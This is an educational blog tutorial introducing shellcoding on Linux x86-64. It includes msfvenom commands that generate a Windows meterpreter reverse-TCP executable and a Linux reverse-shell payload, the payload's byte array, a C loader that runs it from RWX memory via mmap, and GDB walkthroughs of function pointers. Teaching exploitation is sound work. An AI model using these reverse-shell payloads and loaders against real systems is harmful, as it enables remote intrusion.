14. Introduction to Shellcoding

Shellcoding is the art of writing compact, position-independent machine code that can be injected and executed inside another process. At its core, shellcode is pure machine code — hexadecimal bytes that the CPU executes directly. It’s not a high-level language; there’s no compiler to hold your hand. The name is a bit of a misnomer; it historically referred to code that spawned a shell (like /bin/sh), but now it’s a general term for the payload in an exploit, which could do anything: reverse a shell, add a user, or just call a specific API.

This section explains what shellcode is, why it matters, and how to write effective shellcode.

The key challenges are:

  1. It must be self-contained. No linking to external libraries.
  2. It must be position-independent. It doesn’t know where in memory it will live.
  3. It must often avoid certain bytes (bad characters). Null bytes (0x00) terminate a string copy such as strcpy, and newlines (0x0a) or carriage returns (0x0d) are frequently a problem too.
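The bad-character constraint is easy to check mechanically. The following is a minimal sketch, not part of any tool: the function name `find_bad_byte` and its parameters are made up for illustration. It scans a buffer and reports where the first forbidden byte sits.

```c
#include <stddef.h>

/* Return the index of the first byte in buf that is also in the
 * bad-character set, or -1 if the buffer is clean.
 * (Hypothetical helper, named for this example only.) */
long find_bad_byte(const unsigned char *buf, size_t len,
                   const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++) {
        for (size_t j = 0; j < nbad; j++) {
            if (buf[i] == bad[j]) {
                return (long)i;
            }
        }
    }
    return -1;
}
```

Called with the set {0x00, 0x0a, 0x0d}, it returns -1 for a clean buffer and the offset of the first offending byte otherwise.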

Does size matter?

Yes — and not just historically. Payloads used to have very tight size limits, and even today smaller payloads are easier to hide and more portable. Rather than calling library functions, shellcode typically invokes syscalls (the kernel interface) directly.
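To get a feel for what "invoking a syscall directly" means, here is a rough C sketch for Linux. It assumes glibc's `syscall()` helper, and the function name `raw_write_stdout` is invented for this example. Note that `syscall()` is itself a thin libc wrapper; real shellcode would load the registers and issue the `syscall` instruction on its own, so treat this only as an illustration of the interface.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Write len bytes of msg to stdout by syscall number instead of
 * going through printf() or write().
 * Returns the number of bytes written, or -1 on error.
 * (Hypothetical helper, named for this example only.) */
long raw_write_stdout(const char *msg, size_t len)
{
    return syscall(SYS_write, STDOUT_FILENO, msg, len);
}
```

The three arguments after `SYS_write` are the same values that hand-written shellcode would place in rdi, rsi and rdx before executing `syscall`.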

Before starting this I highly encourage you to complete the previous posts related to x86-64 assembly.

Shellcode vs. Payload: What’s the Real Difference?

If you’re diving into the world of exploitation, you’ve likely heard the terms “shellcode” and “payload” used, sometimes even interchangeably. While they are closely related, they are not the same thing.

The Analogy: A Military Operation

Think of a cyber attack like a special forces operation:

  • The Payload is the entire mission package. It’s the overall objective: “Infiltrate the enemy base, plant a listening device in the commander’s office, and exfiltrate undetected.” The payload defines the what and the why.
  • The Shellcode is the highly trained commando team itself. They are the self-contained, executable component that carries out the core, technical task. They are the how.

Example: A Metasploit Payload

When you use msfvenom in Metasploit, you are generating a complete payload. For example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > malicious.exe

This payload (malicious.exe) contains:

  • The shellcode responsible for creating the reverse TCP connection.
  • A decoder stub to decode the shellcode if encoding was used.
  • All the necessary configuration data (IP, port).
  • Wrapped in an executable format.

Let’s generate Linux shellcode with msfvenom, a command-line utility that ships with the Metasploit Framework, and then try to execute it from C.

We will use a simple Linux x64 payload that creates a reverse TCP shell. This is one of the most common payloads: it connects back to our machine and gives us a shell.

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 338 bytes
unsigned char buf[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

Now we need a way to execute this raw machine code. We’ll create a simple C program that places our shellcode in memory and jumps to it.

Let’s create a C file shellcode_loader.c

#include <stdio.h>
#include <string.h>

// Our msfvenom-generated shellcode
unsigned char code[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

int main() {
    // Use sizeof, not strlen: the payload contains null bytes, so strlen would stop early
    printf("Shellcode Length: %zu bytes\n", sizeof(code) - 1);
    
    // Cast the shellcode array to a function pointer and execute
    int (*ret)() = (int(*)())code;
    
    printf("Starting execution...\n");
    ret();
    
    // This line will only be reached if the shellcode fails
    printf("Shellcode execution completed (or failed)\n");
    return 0;
}

The program compiles, but when we run it on a modern system it will most likely crash with a segmentation fault.

By default, modern systems have security protections that prevent our shellcode from running, because the code array lives in the non-executable data section. They enforce Data Execution Prevention (DEP), also called a W^X (Write XOR Execute) policy:

  • Memory pages can be either writable OR executable, but not both
  • This prevents attackers from injecting and executing code

To get around this in our test loader, we need to use mmap. You can learn more about mmap in my System Programming Series.

void *exec_mem = mmap(NULL, sizeof(code), 
                     PROT_READ | PROT_WRITE | PROT_EXEC,  // ← Explicitly requesting EXECUTE permission
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

Using mmap, we allocate a new memory region and explicitly set its permissions to RWX. The shellcode is copied into this region, and the CPU can then execute instructions from it.

Let’s try to implement this behaviour.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Our msfvenom-generated shellcode
unsigned char code[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05"; // Stored in data section (RW-)


int main() {
    // Use sizeof, not strlen: the payload contains null bytes, so strlen would stop early
    printf("Shellcode Length: %zu bytes\n", sizeof(code) - 1);
    
    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(code), 
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    
    if (exec_mem == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
    
    printf("Allocated executable memory at: %p\n", exec_mem);
    
    // Copy shellcode to executable memory
    memcpy(exec_mem, code, sizeof(code));
    
    printf("Executing shellcode...\n");
    
    // The first loader crashed because it jumped straight into the data section:
    // int (*ret)() = (int(*)())code;
    // ret();
      
    // Cast to function pointer and execute
    int (*func)() = (int(*)())exec_mem;
    func();
    
    // Cleanup (though we may not reach this)
    munmap(exec_mem, sizeof(code));
    
    return 0;
}

Let’s review the memory layout once again:

[Text Section]    - READ/EXECUTE permission (your main() code)
[Data Section]    - READ/WRITE permission (your shellcode array)
[Stack]           - READ/WRITE permission
[Heap]            - READ/WRITE permission
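
On Linux you can confirm these permissions from inside a running process by reading /proc/self/maps. The following is a small sketch under that assumption; `region_perms` and `sample_data` are names invented for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Find the mapping that contains addr in /proc/self/maps and copy its
 * permission string (for example "r-xp") into perms.
 * Returns 0 on success, -1 if the address was not found or the file
 * could not be opened.
 * (Hypothetical helper, named for this example only.) */
int region_perms(const void *addr, char perms[5])
{
    FILE *maps = fopen("/proc/self/maps", "r");
    if (maps == NULL) {
        return -1;
    }

    uintptr_t target = (uintptr_t)addr;
    char line[512];
    int found = -1;

    while (fgets(line, sizeof line, maps) != NULL) {
        unsigned long start, end;
        char p[5] = {0};
        /* Each line starts with "start-end perms", both addresses in hex. */
        if (sscanf(line, "%lx-%lx %4s", &start, &end, p) == 3 &&
            target >= start && target < end) {
            memcpy(perms, p, sizeof p);
            found = 0;
            break;
        }
    }

    fclose(maps);
    return found;
}

/* Example object that lives in the data section, like the shellcode array. */
unsigned char sample_data[] = "\x90\x90";
```

Passing the address of `sample_data` should report a mapping without the x flag, while passing the address of a function should report one with it, which is exactly why jumping into the array crashes.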

If you’re feeling overwhelmed by this line:

int (*ret)() = (int(*)())code;
ret();

You’re not alone! This syntax might look intimidating at first, but it’s actually quite logical once we break it down.

Think of your shellcode bytes:

"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f..."

These aren’t just random numbers! They are encoded CPU instructions, each one or more bytes long, that the processor understands directly:

  • \x6a\x29 = push 0x29
  • \x58 = pop rax
  • \x99 = cdq (sign-extends EAX into EDX; EAX holds 0x29 here, so this zeroes RDX)
  • \x6a\x02 = push 0x2
  • \x5f = pop rdi
  • etc.

To see the complete picture, you can use an online disassembler like Defuse.ca’s Online X86 Assembler and paste your shellcode as a hex string.

First, generate the shellcode in hex format:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f hex
#...
6a2958996a025f6a015e0f05489748b90200115c7f000001514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05

Paste this into the disassembler, and you’ll see the human-readable assembly instructions:

Disassembly:

0:  6a 29                   push   0x29  
2:  58                      pop    rax  
3:  99                      cdq  
4:  6a 02                   push   0x2  
6:  5f                      pop    rdi

This visualization makes it clear: your shellcode is literally a mini-program written directly in machine language, just waiting to be executed!
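
If you only have the C array form of a payload, a few lines of C can produce the same hex string that `-f hex` prints, ready to paste into a disassembler. This is a minimal sketch; the function name `to_hex` is made up for this example.

```c
#include <stddef.h>
#include <stdio.h>

/* Write the lowercase hex encoding of buf into out.
 * out must have room for 2 * len + 1 characters.
 * (Hypothetical helper, named for this example only.) */
void to_hex(const unsigned char *buf, size_t len, char *out)
{
    for (size_t i = 0; i < len; i++) {
        /* Two hex digits plus the terminator snprintf always writes. */
        snprintf(out + 2 * i, 3, "%02x", buf[i]);
    }
    out[2 * len] = '\0';
}
```

Feeding it the first four bytes of the shellcode (0x6a, 0x29, 0x58, 0x99) gives the string 6a295899, matching the start of the msfvenom hex output.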

Let’s look at a bit of C that we already know.

void hello() {
    printf("Hello World!\n");
}

int main() {
    hello();  // Call the function
}

The function hello() is at some memory address. Calling hello() jumps to that address and executes.

What is a Function Pointer?

void hello() {
    printf("Hello World!\n");
}

int main() {
    void (*func_ptr)() = hello;  // func_ptr points to hello's address
    func_ptr();  // Calls hello via the pointer
}

Here, func_ptr is a variable that holds a memory address. That address points to executable code, and func_ptr() jumps to that address and executes it.

Now let’s break this line down:

int (*ret)() = (int(*)())code;

We are declaring ret, a pointer to a function. The function returns int, and the empty parentheses () leave its parameters unspecified (before C23, an empty list in C means “any arguments”, not “no arguments”).

(int(*)())code

  • This is a cast that says: “Treat code as a function pointer”
  • (int(*)()) means “pointer to function returning int”
  • We’re telling the compiler: “I know code is a byte array, but trust me, it’s actually machine code”
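
If the cast syntax is the hard part, a typedef can make it easier to read. The sketch below uses an ordinary function as a stand-in for machine code; `entry_fn`, `answer` and `call_address` are names invented for this example, and the cast from void * to a function pointer relies on behaviour that POSIX systems provide rather than on strict ISO C.

```c
/* Alias for "pointer to a function that takes no arguments and returns int". */
typedef int (*entry_fn)(void);

/* Stand-in for real machine code: a normal function with the same shape. */
int answer(void)
{
    return 42;
}

/* Treat a plain address as code and call it.
 * (Hypothetical helper, named for this example only.) */
int call_address(void *addr)
{
    entry_fn fn = (entry_fn)addr;  /* same idea as (int(*)())code */
    return fn();
}
```

Calling `call_address((void *)answer)` runs `answer` through the pointer and returns 42. With shellcode, the only difference is that the address points at bytes you supplied instead of at a function the compiler produced.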

Simplified version -

// Before cast: code is an array of bytes
unsigned char code[] = {0x6a, 0x29, 0x58, ...};

// After cast: ret points to the SAME memory, but we're telling 
// the compiler it contains executable code
int (*ret)() = (int(*)())code;

// This generates: call [address of code]
ret();

Sometimes, the best way to understand a concept is to see it working at the lowest level. Let’s debug our function pointer example using GDB to see what’s really happening behind the scenes.

#include <stdio.h>

void hello() {
    printf("Hello World!\n");
}

int main() {
    void (*func_ptr)() = hello;  // func_ptr points to hello's address
    func_ptr();  // Calls hello via the pointer
}

Compile it and load it into GDB (the pwndbg> prompt below comes from the pwndbg plugin):

$ gcc -o func_ptr func_ptr.c
$ gdb ./func_ptr
pwndbg> start
#...
pwndbg> disass main
Dump of assembler code for function main:
   0x0000555555555163 <+0>:	endbr64 
   0x0000555555555167 <+4>:	push   rbp
   0x0000555555555168 <+5>:	mov    rbp,rsp
=> 0x000055555555516b <+8>:	sub    rsp,0x10
   0x000055555555516f <+12>:	lea    rax,[rip+0xffffffffffffffd3]        # 0x555555555149 <hello>
   0x0000555555555176 <+19>:	mov    QWORD PTR [rbp-0x8],rax
   0x000055555555517a <+23>:	mov    rdx,QWORD PTR [rbp-0x8]
   0x000055555555517e <+27>:	mov    eax,0x0
   0x0000555555555183 <+32>:	call   rdx
   0x0000555555555185 <+34>:	mov    eax,0x0
   0x000055555555518a <+39>:	leave  
   0x000055555555518b <+40>:	ret    
End of assembler dump.

Let’s step to the point where the function pointer is called:

pwndbg> nextcall
#...
pwndbg> disass
Dump of assembler code for function main:
   0x0000555555555163 <+0>:	endbr64 
   0x0000555555555167 <+4>:	push   rbp
   0x0000555555555168 <+5>:	mov    rbp,rsp
   0x000055555555516b <+8>:	sub    rsp,0x10
   0x000055555555516f <+12>:	lea    rax,[rip+0xffffffffffffffd3]        # 0x555555555149 <hello>
   0x0000555555555176 <+19>:	mov    QWORD PTR [rbp-0x8],rax
   0x000055555555517a <+23>:	mov    rdx,QWORD PTR [rbp-0x8]
   0x000055555555517e <+27>:	mov    eax,0x0
=> 0x0000555555555183 <+32>:	call   rdx
   0x0000555555555185 <+34>:	mov    eax,0x0
   0x000055555555518a <+39>:	leave  
   0x000055555555518b <+40>:	ret  

If you print the address of the hello function, you’ll find it is exactly the same as the address stored in rdx.

pwndbg> p hello
$1 = {<text variable, no debug info>} 0x555555555149 <hello>
pwndbg> reg rdx
*RDX  0x555555555149 (hello) ◂— endbr64

I hope this makes things clear for you now.

In the next part, we will take a deep dive into syscalls.

This post is licensed under CC BY 4.0 by the author.